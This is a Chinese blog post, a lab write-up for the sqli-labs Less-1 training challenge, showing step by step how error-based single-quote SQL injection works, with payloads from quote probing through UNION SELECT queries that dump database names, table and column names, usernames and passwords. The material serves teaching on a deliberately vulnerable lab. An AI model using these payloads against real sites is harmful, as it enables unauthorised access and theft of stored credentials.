sql-labs SQL注入平台-第1关Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)

已于 2022-07-25 21:44:34 修改
阅读量1.4k 收藏 4
点赞数 2
分类专栏: # Bugku、XCTF-WEB类写题过程
于 2022-07-25 21:32:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Onlyone_1314/article/details/125983747
版权

SQL注入 数据库安全 信息泄露 PHP配置 Web安全
关键词由CSDN通过智能技术生成

记得把php.in中的转义参数magic_quotes_gpc配置成Off:
在这里插入图片描述

不然发送的请求参数中的符号会被加上\转义,从而无法直接拼接到SQL语句中去

Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)

在这里插入图片描述

第一关提示我们输入ID作为参数和数值
查询id=1:
在这里插入图片描述

显示了
Your Login name:Dumb
Your Password:Dumb
查询id=1’
在这里插入图片描述

出现报错,输出的1’拼接成了’1’’ LIMIT 0,1
limit 0,1, 从你的表中的第0个数据开始,只读取一个
查询1’ and ‘1’='2
在这里插入图片描述

没有结果
查询1’ and ‘1’='1
在这里插入图片描述

正常返回结果
证明可以成功拼接查询返回结果
查询1’ or 1=1; --+可以返回表中所有数据

SELECT * FROM users WHERE id='1' or 1=1; -- ' LIMIT 0,1

在这里插入图片描述

但是源代码中的mysql_fetch_array函数每次只从结果集中取得一行作为关联数组:
在这里插入图片描述

所以每次只会在前端显示一行数据

接下来我们先查询这个表中有多少列数据,先将返回结果按照1,2,3列排序:
查询

1' order by 3;--+

在这里插入图片描述

都正常返回,证明表中至少有三列数据
查询

1' order by 4;--+

在这里插入图片描述

没有第4列,说明表中只有三列数据
接下来我们使用union联合查询查找表中的数据
查询

0' union select 1,2,3 --+

在这里插入图片描述

查询3列的返回数据,在前端显示的只有2和3,意味着我们的注入点只能是2和3

2、猜测数据库

查询当前数据库名称

0' union select 1,database(),3 --+

在这里插入图片描述

当前数据库名称是security
也可以查看所有数据库的名称:

0' union select 1,group_concat(schema_name),3 from information_schema.schemata --+

在这里插入图片描述

得到所有数据库的名称:information_schema,challenges,mysql,performance_schema,security,sys

3、猜测数据库表︰

之后查看security数据库下的表名

id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

在这里插入图片描述

得到security数据库下的表名:emails,referers,uagents,users

4、猜字段

查看users表下面有哪些字段

id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema="security" and table_name="users" --+

在这里插入图片描述

接下来我们就可以读取用户名和密码的值了

id=0' union select 1,group_concat(username),3 from security.users --+

在这里插入图片描述

读取密码的值:

id=0' union select 1,group_concat(password),3 from security.users --+

在这里插入图片描述

成功读取数据库中的字段值

大灬白
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
GET-ERROR based-Single quotesString (GET基于错误单引号字符注入) Less-1
water0diamond的博客
03-12 924
数据库的一些基础,会在前一篇提前准备篇中提到 首先打开网站首页,会发现如下界面:显示请输入id作为带数值的参数,那么下一步,我们就可以将参数传入试着提交然后看会有什么返回值。 使用get方式提交id参数,这样我们就可以得到返回值。可以看得到首页给出了用户名和密码。 然后再测id类是否为字符串,用单引号测试,出现‘’’说明id为字符串类 那么下面我们试着添加...
sqli lab page1-lesson1[GET - Error based - Single quotes - String(基于错误的GET单引号字符注入)]
m0_68980215的博客
06-28 169
sqlilab,page1-lesson1
sqli-labs】 less1 GET - Error based - Single quotes - String(GET基于错误单引号字符注入)...
ajxi63204的博客
01-18 154
   GET方式提交id参数 添加单引号,出现报错,爆出数据库名称和部分SQL语句 http://localhost/sqli/Less-1/?id=1' 使用order by猜测字段数,用#注释掉后面limit 0,1语句 http://localhost/sqli/Less-1/?id=1' order by 1# 字符#浏览器不会编码可以手动...
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符注入)
weixin_44368248的博客
04-14 624
1.根据图中的提示在url上加上?id=1 2.输入单引号,发现页面报错(通过在url中修改对应的id值。为正常数字、大数字、字符、(单引号、双引号、双单引号、括号)、反斜杆来探测url是否存在注入点) 由报错信息可知,可以通过单引号闭合 3.通过order by +数字来判断当前的字段数,输入order by 10报错,输入order by 5还报错,输入order by 3没有报错,在输入or...
Sql注入-Less-1
dahege666的博客
04-02 416
一、环境搭建 apache+mysql+php Tomcat+mysql+java(部分卡需要) 如果可以的话,推荐在 windows 和 linux 下分别安装: Windows 下可以用 wamp、phpstudy、apmserv 等直接安装,linux 下可在网上搜索教程进行 安装。我 的测 试 环 境 是 windows 下 用 phpstudy 直 接 搭 建 的. sqli-l...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
sqIi-labs,SQL注入平台
08-06
sqIi-labs:是一款学习SQL注入的开源平台,共有75种不同类注入 解压密码:ms08067.com sqIi-labs的使用文章见:https://blog.csdn.net/qq_41453285/article/details/100827739
sql-labs通技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
SQL-li-labs则是针对SQL注入攻击的练习平台,帮助学习者理解如何预防这种类的攻击。 首先,我们来详细了解一下PHPStudy。PHPStudy提供了一个简单的界面来管理PHP版本切换、Apache和Nginx服务器的启动与停止,以及...
sqli-labs靶场练习笔记
最新发布
11-09
- **测试方法**:通过构造包含单引号SQL语句来测试是否存在单引号注入漏洞。 - **示例**:利用`union`选择语句尝试获取额外信息,如`id=1' union select 1,2,3--`。 - **第5:布尔盲注实战** - **特点**:同...
sqli-lab教程——Less-11 POST - Error Based - Single quotes- String (基于错误的POST单引号字符注入)
luosaierdadi的博客
07-09 243
模拟真实环境,我们作为Dump用户使用Dump密码登陆,可以看到以下 登陆成功此时打开hackbar选中post可以看到,已经自动载入的刚才提交的表单数据: 我刚测试了一下,hackbar提交uname=admin' and 1=2 --+&passwd=admin&submit=Submit作为post参数时,无论and后面是1=1还是1=2,都能登陆,不知道为什么,可能是提交的时候自动加了+号连接语句的问题。所以现在改用burpsuit,抓包修改参数。 输入admin admin 登陆,抓包,发送到re
sql注入sqli/less-1)
eggplant_lala的博客
02-14 100
sql注入基本sqli/less-1 模拟注入思路
SQL注入Sqli-labs-Less1-4 》
weixin_47118413的博客
04-17 2761
讲解分析sqli-labs第1—4解题思路和流程。首先判断这四是什么交互方式(GET/POST),在判断是什么类注入,之后找到闭合方式,在进行数据库爆破。
sql注入CTF less-1
qq_53851730的博客
04-14 258
请输入ID作为带数值的参数 我们先输入一个id=2,有显示,然后我们现在判断一下是字符值类还是数值类的(注:字符和数值类的攻击方式不一样) 判断方法为在id=2后面加’ 加入后说明这个是字符SQL注入,接下来就好办了 使用order by查看有多少字段,但是我们发现代码竟然报错了 翻译:您的SQL语法有错误;请查看与MySQL服务器版本对应的手册,以了解在第1行使用接近极限0,1'的正确语法 这个说明是sql语句是问题然后我们看一下我们输入的sql语句实际...
SQL注入sqli-labs】Less 1 - Less 5 练习笔记
全栈纸伞
07-09 1043
SQL注入sqli-labs】Less 1 - Less 5 练习笔记0x00 部署sqli-labs这部分相信大部分人都会了,我简单推荐一种简单的组合 wamp 实现一键部署,其中包含PHP环境 navicat 导入数据 这里悄悄的给出一种作弊的方法,就是在每句SQL语句后面:echo $sql. '<br>';如果是练习盲注的同学还是老老实实按照不作弊的方式来。0x01 开始练习L
sqli-labs-less-1完整解析,小白干货
yzcn
10-22 1947
Less-1 Sql知识点: Limit(x,y):从x+1行开始输出,共输出y行 Order by:排序,asc升序(默认),desc(降序) Union:MySQL执行两条SELECT语句,并把输出组合成单个查询结果集 Group_concat:连接作用,group_concat( 要连接的字段 ) [Order BY 排序字段 ASC/DESC] [Separator ‘分隔符’] concat_ws:concat_ws(‘-’,a,b) 将a和b用-连接起来 MySQL中默认建立的数据库
通过sqli-labs学习sql注入——基础挑战之less1-10
热门推荐
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
sqli-labs通攻略教程一(less 01~less 02)
m0_55854679的博客
06-12 355
数据库知识整理 MYSQL基本用法 查库 show databases; ##方法1 select schema_name from information_schema.schemata; ##方法2 2. 查表 use security; ##方法1 show tables; select table_name from information_schema.tables where table_schema='security' ##方法2 3. 查列 se
sqlilabs第一懵逼小解答
zlloveyouforever的博客
03-13 4915
sqlilabs第一新手大解惑,小白看过来,大佬不要来。绝对很详细哦,骗你是修勾。
SQL注入实战:sqli-labs实验详解
本实验手册主要针对基于单引号字符联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库信息的步骤。” SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意SQL代码来获取、修改、...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值